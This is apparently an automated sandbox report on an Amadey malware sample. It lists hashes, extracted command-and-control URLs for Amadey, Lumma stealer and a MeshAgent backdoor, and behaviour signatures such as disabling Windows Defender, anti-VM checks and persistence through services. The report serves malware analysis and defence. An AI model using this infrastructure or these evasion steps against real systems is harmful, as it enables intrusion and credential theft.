amadey | bbd0e0c8992b91a114ccb9ecba91d146ae17a35a5b85a1c107fd273d18b4e089

Analysis

max time kernel
126s
max time network
151s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
04/04/2025, 18:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

938KB
MD5

cbf68f77f4cd12e46a80430a739ce71f
SHA1

de3df5da3f6cbf132a17cd4b160dfe484c5725b5
SHA256

bbd0e0c8992b91a114ccb9ecba91d146ae17a35a5b85a1c107fd273d18b4e089
SHA512

7a6fe5f78c7c068d196912edd2bd7e4bf5fc679ffdb198fe0ef9677b297bef9b7fa5416f1d930bc4f26bb23d20aab5dee653d386a55a5978a6be1506b406fb28
SSDEEP

24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8a0yu:6TvC/MTQYxsWR7a0y

Score

10^/10

amadey lumma meshagent 092155 test123 backdoor defense_evasion discovery execution exploit persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://reboundui.live/aomgd

https://jrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://xrfxcaseq.live/gspaz

https://ywmedici.top/noagis

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://28jrxsafer.top/shpaoz

https://kadvennture.top/GKsiio

https://ogrxeasyw.digital/xxepw

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Extracted

Family

meshagent

Version

Botnet

test123

http://aaso12.duckdns.org:443/agent.ashx

Attributes

mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
wss
wss://aaso12.duckdns.org:443/agent.ashx

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects MeshAgent payload 1 IoCs

resource	yara_rule
behavioral1/files/0x00020000000001d5-3199.dat	family_meshagent

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Modifies security service 2 TTPs 3 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Contacts a large (5286) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5829606600.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	but2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	5172	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2872	powershell.exe
5172	powershell.exe
4820	powershell.exe
5780	powershell.exe
3316	powershell.exe
5552	powershell.exe
5128	powershell.exe
6036	powershell.exe
2132	powershell.exe
4964	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 10 IoCs

flow	pid	Process
7755	1112	rapes.exe
7755	1112	rapes.exe
7755	1112	rapes.exe
31	1112	rapes.exe
17103	1112	rapes.exe
18363	1112	rapes.exe
555	1112	rapes.exe
555	1112	rapes.exe
8	5172	powershell.exe
20	1112	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
1684	takeown.exe
3620	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5829606600.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5829606600.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	but2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	larBxd7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE

Executes dropped EXE 25 IoCs

pid	Process
3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
1112	rapes.exe
3624	9sWdA2p.exe
4056	rapes.exe
4716	but2.exe
3688	pcidrv.exe
3612	larBxd7.exe
5196	Jordan.com
5008	qhjMWht.exe
5540	rapes.exe
704	Mbxp0H9.exe
2432	pcidrv.exe
1132	syPMGLnV5U.exe
5760	I9nmNxWMsz.exe
4716	syPMGLnV5U.exe
736	7q8Wm5h.exe
4488	apple.exe
2292	262.exe
3436	262.exe
4388	RLPhvHg.exe
1508	MeshAgent.exe
2752	7q8Wm5h.exe
2316	FrameworkName.exe
1524	5829606600.exe
2636	7IIl2eE.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Software\Wine	5829606600.exe
Key opened	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Software\Wine	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
Key opened	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Software\Wine	but2.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3620	icacls.exe
1684	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	ip-api.com

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\403B5DD05F68A282D6CA8CE3063A30DDA51EBF44	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\07A597F86CAEBA5DFBC686F3F056EFD8B3B1EE0D	MeshAgent.exe
File opened for modification	C:\Windows\System32\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\comctl32.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\4666F9C3AE746309790FFBD8F8603C682101DA38	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\symbols\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	MeshAgent.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4356	tasklist.exe
1376	tasklist.exe
4568	tasklist.exe
2352	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
3680	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
1112	rapes.exe
4056	rapes.exe
4716	but2.exe
5540	rapes.exe
1524	5829606600.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 704 set thread context of 2652	704	Mbxp0H9.exe	127
PID 2752 set thread context of 1996	2752	7q8Wm5h.exe	219

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpOAV.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\NisSrv.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpEvMsg.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MpAsDesc.dll	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\MsMpLics.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpRes.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\MpCmdRun.exe	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ClientWMIInstall.mof	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\EppManifest.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\EppManifest.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ThirdPartyNotices.txt	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\en-US\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpSvc.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\Offline\EppManifest.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement.mof	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MpAzSubmit.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\MsMpEng.exe	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ProtectionManagement_Uninstall.mof	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\shellext.dll	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4360	sc.exe
3556	sc.exe
3668	sc.exe
5868	sc.exe
4452	sc.exe
3212	sc.exe
708	sc.exe
1528	sc.exe
4728	sc.exe
5812	sc.exe
4692	sc.exe
5156	sc.exe
5840	sc.exe
4444	sc.exe
224	sc.exe
5316	sc.exe
6040	sc.exe
4712	sc.exe
1408	sc.exe
4824	sc.exe
5188	sc.exe
5872	sc.exe
3444	sc.exe
2268	sc.exe
4056	sc.exe
4272	sc.exe
4024	sc.exe
1340	sc.exe
5244	sc.exe
3812	sc.exe
1136	sc.exe
2388	sc.exe
3008	sc.exe
2700	sc.exe
3624	sc.exe
6016	sc.exe
5052	sc.exe
5256	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pcidrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempAGWF9C002XUM4DKTUBQTUCKJRELBWXKB.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5829606600.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	I9nmNxWMsz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qhjMWht.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	but2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
5696	timeout.exe
2336	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
